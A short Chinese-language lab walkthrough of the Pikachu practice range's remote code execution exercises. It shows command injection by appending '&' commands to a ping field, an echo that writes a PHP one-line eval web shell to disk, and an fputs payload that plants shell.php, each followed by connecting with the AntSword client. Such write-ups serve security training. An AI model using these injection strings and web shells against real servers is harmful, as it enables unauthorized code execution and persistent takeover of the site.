Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
爱学习的小囧30 分钟前
VMware Horizon 8 智能卡认证信任库配置攻略:新增 Root CA 导入指南
服务器·esxi·vmware·horizon
IP老炮不瞎唠33 分钟前
谷歌账号安全运营指南
安全
兢谨网安38 分钟前
AI安全:从技术加固到体系化防御的实战演进
人工智能·安全·网络安全·渗透测试
望安认证2 小时前
通用准则Common Criteria认证:海外项目投标的核心安全资质——CC EAL
安全
鹿鸣天涯2 小时前
OpenClaw安全使用实践指南
安全
信创DevOps先锋2 小时前
中国DevOps工具链选型新趋势:合规、协同与生态融合的平衡之道
运维·gitee·devops
Magic--2 小时前
深入解析管道:最基础的进程间通信(IPC)实现
java·服务器·unix
xingxin323 小时前
PHP代码分析溯源(第3题)
安全·web安全·网络安全·php
LlNingyu3 小时前
文艺复兴,什么是CSRF,常见形式(一)
前端·安全·web安全·csrf
白鸽梦游指南3 小时前
docker镜像优化
linux·运维·docker